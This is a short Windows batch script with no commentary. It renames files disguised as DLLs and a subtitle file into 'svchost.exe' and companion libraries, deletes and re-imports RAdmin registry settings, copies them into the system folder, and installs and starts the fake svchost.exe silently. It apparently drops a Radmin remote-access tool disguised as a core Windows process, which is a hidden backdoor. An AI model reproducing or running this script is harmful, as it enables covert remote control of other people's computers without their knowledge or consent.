@echo off rename core.dll svchost.exe rename vmode.dll admdll.dll rename vdrv.srt raddrv.dll REG delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll" copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll" reg import settings.reg "%SYSTEMROOT%/svchost.exe" /install /silence "%SYSTEMROOT%/svchost.exe" /start